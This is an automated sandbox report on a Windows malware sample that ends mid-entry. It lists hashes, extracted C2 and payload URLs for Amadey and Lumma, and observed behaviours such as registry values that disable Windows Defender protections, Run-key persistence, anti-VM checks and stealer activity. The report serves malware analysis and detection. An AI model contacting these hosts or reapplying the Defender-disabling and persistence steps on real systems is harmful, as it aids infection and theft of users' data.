Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 14:49
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
ce2b9785c340ab0ff7d0a35e99f27317
-
SHA1
b6b9a11d00b8ed50db4a0f6be6fa8c59e704ca0b
-
SHA256
6de611581e7afbb1bb6fbdea27022d3265144ee3312d47f8d95aa4d6f0e10d26
-
SHA512
38f7fd0bc19858ecf977dd6ecb61d2ae6b63dd0d88714c957a4a7790c9be118d993b3f022cc0305a5d1a97b5a46bde47a0bbc46ec48fea5b063add97ac4be2f2
-
SSDEEP
24576:uqDEvCTbMWu7rQYlBQcBiT6rprG8a0ou:uTvC/MTQYxsWR7a0o
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://advennture.top/GKsiio
https://atargett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://iqironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://madvennture.top/GKsiio
https://targett.top/dsANGt
https://qspacedbv.world/EKdlsk
https://igalxnetb.today/GsuIAo
https://hcosmosyf.top/GOsznj
https://hywnnavstarx.shop/FoaJSi
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/5996-762-0x0000000000450000-0x0000000000884000-memory.dmp healer behavioral1/memory/5996-763-0x0000000000450000-0x0000000000884000-memory.dmp healer behavioral1/memory/5996-808-0x0000000000450000-0x0000000000884000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" e5367c195a.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" e5367c195a.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection e5367c195a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" e5367c195a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" e5367c195a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" e5367c195a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" e5367c195a.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" e5367c195a.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications e5367c195a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" e5367c195a.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x00090000000241bc-100.dat family_stormkitty behavioral1/memory/4344-113-0x0000000000BC0000-0x0000000000BFC000-memory.dmp family_stormkitty -
Stormkitty family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5520df3a73.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 08f072925b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e5367c195a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8dcf8981c4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 74899c17d4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE -
Blocklisted process makes network request 1 IoCs
flow pid Process 13 4624 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2176 powershell.exe 4624 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 16 IoCs
flow pid Process 186 3068 rapes.exe 186 3068 rapes.exe 186 3068 rapes.exe 187 4776 svchost015.exe 236 4896 svchost.exe 13 4624 powershell.exe 28 3068 rapes.exe 28 3068 rapes.exe 28 3068 rapes.exe 28 3068 rapes.exe 28 3068 rapes.exe 28 3068 rapes.exe 28 3068 rapes.exe 28 3068 rapes.exe 28 3068 rapes.exe 83 1796 svchost015.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 3816 takeown.exe 2960 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 08f072925b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f4bcfb7a05.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e5367c195a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e5367c195a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 74899c17d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8dcf8981c4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8dcf8981c4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 74899c17d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5520df3a73.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5520df3a73.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 08f072925b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f4bcfb7a05.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 261.exe -
Executes dropped EXE 23 IoCs
pid Process 1376 TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE 3068 rapes.exe 4352 apple.exe 2636 261.exe 4936 261.exe 3860 3sZiUQa.exe 4344 KXtPusH.exe 3284 8dcf8981c4.exe 2736 74899c17d4.exe 1796 svchost015.exe 3448 rapes.exe 4900 5520df3a73.exe 4776 svchost015.exe 3584 08f072925b.exe 2684 f4bcfb7a05.exe 4848 458e534b04.exe 5996 e5367c195a.exe 1380 rapes.exe 4060 d11e195f79.exe 264 e94476edd2.exe 1604 Rm3cVPI.exe 5148 UZPt0hR.exe 5740 tzutil.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 74899c17d4.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 5520df3a73.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 8dcf8981c4.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 08f072925b.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine e5367c195a.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 3816 takeown.exe 2960 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" e5367c195a.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features e5367c195a.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e5367c195a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419580101\\e5367c195a.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\08f072925b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419550101\\08f072925b.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f4bcfb7a05.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419560101\\f4bcfb7a05.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\458e534b04.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419570101\\458e534b04.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 32 ipinfo.io 33 ipinfo.io -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000700000002420f-290.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 1376 TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE 3068 rapes.exe 3284 8dcf8981c4.exe 2736 74899c17d4.exe 3448 rapes.exe 4900 5520df3a73.exe 3584 08f072925b.exe 5996 e5367c195a.exe 1380 rapes.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2736 set thread context of 1796 2736 74899c17d4.exe 200 PID 4900 set thread context of 4776 4900 5520df3a73.exe 204 PID 4060 set thread context of 5236 4060 d11e195f79.exe 234 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3508 sc.exe 3216 sc.exe 4568 sc.exe 512 sc.exe 5080 sc.exe 1304 sc.exe 2456 sc.exe 1892 sc.exe 800 sc.exe 1332 sc.exe 4500 sc.exe 2344 sc.exe 4596 sc.exe 3676 sc.exe 1924 sc.exe 1060 sc.exe 4188 sc.exe 4552 sc.exe 4868 sc.exe 4440 sc.exe 5024 sc.exe 2196 sc.exe 1348 sc.exe 4128 sc.exe 4260 sc.exe 4772 sc.exe 3512 sc.exe 2632 sc.exe 3768 sc.exe 4380 sc.exe 2772 sc.exe 1376 sc.exe 4136 sc.exe 1004 sc.exe 212 sc.exe 1692 sc.exe 4356 sc.exe 1772 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 400 4344 WerFault.exe 176 -
System Location Discovery: System Language Discovery 1 TTPs 37 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KXtPusH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e94476edd2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08f072925b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 458e534b04.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 74899c17d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e5367c195a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8dcf8981c4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 458e534b04.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZPt0hR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5520df3a73.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 458e534b04.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4928 cmd.exe 1692 netsh.exe -
Checks processor information in registry 2 TTPs 22 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier KXtPusH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString f4bcfb7a05.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 f4bcfb7a05.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried 